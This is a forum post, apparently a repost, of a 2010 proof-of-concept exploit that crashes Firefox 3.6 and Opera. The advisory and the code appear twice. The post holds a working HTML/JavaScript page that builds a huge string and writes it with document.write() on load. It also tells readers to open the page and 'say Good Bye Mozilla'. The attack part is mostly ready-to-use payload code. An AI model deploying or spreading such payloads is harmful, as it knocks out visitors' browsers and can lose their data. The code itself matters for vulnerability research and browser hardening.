Mozilla Firefox v3.6 and Opera Long String Crash Exploit
Publicado: 20 Mar 2010, 16:38
# code by Asheesh kumar Mani Tripathi
# email: [email protected]
# company : AKS IT Services
# Credit by Asheesh Anaconda
#Background
Mozilla Firefox is a popular internet browser. .....
#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
MOzilla Crash
#Proof of concept
copy the code in text file and save as "asheesh.html" and closed all tabs and windows to avoid any lost of data
open in Mozilla Firefox and wait for 15 sec ...... and say Good Bye
Mozilla .......
Per usske phele Mozilla k antim darshan kar le Prem se bolo jai maata di
Mozilla Rest In Piece!!!!!!!!!!!!!!!!!!!!!!!!!!!
================================================== ================================================== ====================
asheesh.html
===============================================
Code:
<html>
<title>asheesh kumar mani tripathi</title>
</br>Asheesh kumar Mani Tripathi
<head>
<script>
function asheesh ()
{
var i=24 , anaconda = "XXXX"
for(i=24;i >0 ;--i)
{
anaconda=anaconda+anaconda;
}
document.write(anaconda);
}
</script>
</head>
<body onLoad="asheesh()"></body>
</html>
DeCrew is offline Add to DeCrew's Reputation Report Post
Updating Thanks, Please Wait Say 'Thank You!' for this post.
Saludos
# email: [email protected]
# company : AKS IT Services
# Credit by Asheesh Anaconda
#Background
Mozilla Firefox is a popular internet browser. .....
#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
MOzilla Crash
#Proof of concept
copy the code in text file and save as "asheesh.html" and closed all tabs and windows to avoid any lost of data
open in Mozilla Firefox and wait for 15 sec ...... and say Good Bye
Mozilla .......
Per usske phele Mozilla k antim darshan kar le Prem se bolo jai maata di
Mozilla Rest In Piece!!!!!!!!!!!!!!!!!!!!!!!!!!!
================================================== ================================================== ====================
asheesh.html
===============================================
Code:
<html>
<title>asheesh kumar mani tripathi</title>
</br>Asheesh kumar Mani Tripathi
<head>
<script>
function asheesh ()
{
var i=24 , anaconda = "XXXX"
for(i=24;i >0 ;--i)
{
anaconda=anaconda+anaconda;
}
document.write(anaconda);
}
</script>
</head>
<body onLoad="asheesh()"></body>
</html>
DeCrew is offline Add to DeCrew's Reputation Report Post
Updating Thanks, Please Wait Say 'Thank You!' for this post.
Saludos